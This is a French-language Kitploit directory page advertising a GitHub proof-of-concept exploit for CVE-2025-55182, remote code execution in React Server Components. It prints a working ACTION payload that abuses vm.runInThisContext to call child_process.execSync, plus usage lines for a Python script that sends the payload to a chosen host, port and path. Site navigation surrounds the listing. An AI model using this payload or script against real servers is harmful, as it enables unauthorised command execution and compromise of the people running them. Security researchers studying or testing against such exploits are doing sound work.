Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182POC — Exploit de preuve de concept pour CVE-2025-55182, démontrant l'exécution de code à distance dans les composants serveur React via des charges utiles ACTION malveillantes et une injection vm.runInThisContext. | Kitploit
Outils/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

Exploit de preuve de concept pour CVE-2025-55182, démontrant l'exécution de code à distance dans les composants serveur React via des charges utiles ACTION malveillantes et une injection vm.runInThisContext.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 8 moisPas encore vérifié

CVE-2025-55182 React Server Components RCE POC

Ce projet est une Preuve de Concept (PoC) pour CVE-2025-55182 - Remote Code Execution (RCE) dans React Server Components (RSC), démontrant que, dans des conditions spécifiques, il est possible de déclencher une exécution de code à distance via vm.runInThisContext et une charge utile ACTION malveillante.

  • Côté Python : envoie automatiquement la charge utile ACTION malveillante et analyse la réponse.

⚠ Présentation de la vulnérabilité (CVE-2025-55182)

La charge utile ACTION des React Server Components, sous certaines conditions :

  • est désérialisée en objet JS
  • est exécutée via vm.runInThisContext
  • est injectée automatiquement dans les server actions

Un attaquant peut construire la charge utile :

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
ParamètreObligatoireValeur par défautDescription
--hostOuiAucuneIP ou nom de domaine du serveur cible. Ex. : 127.0.0.1, 192.168.1.10, example.com
--portNon80Port du service HTTP cible, ex. : 3003
--pathOuiAucuneChemin de la route cible déclenchant la vulnérabilité, ex. : /feedback, /action
--httpsNonFalseUtiliser HTTPS pour envoyer la charge utile (HTTP par défaut)

python a.py --host <IP_cible> --port --path <chemin_URL_cible>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

Télécharger l’outil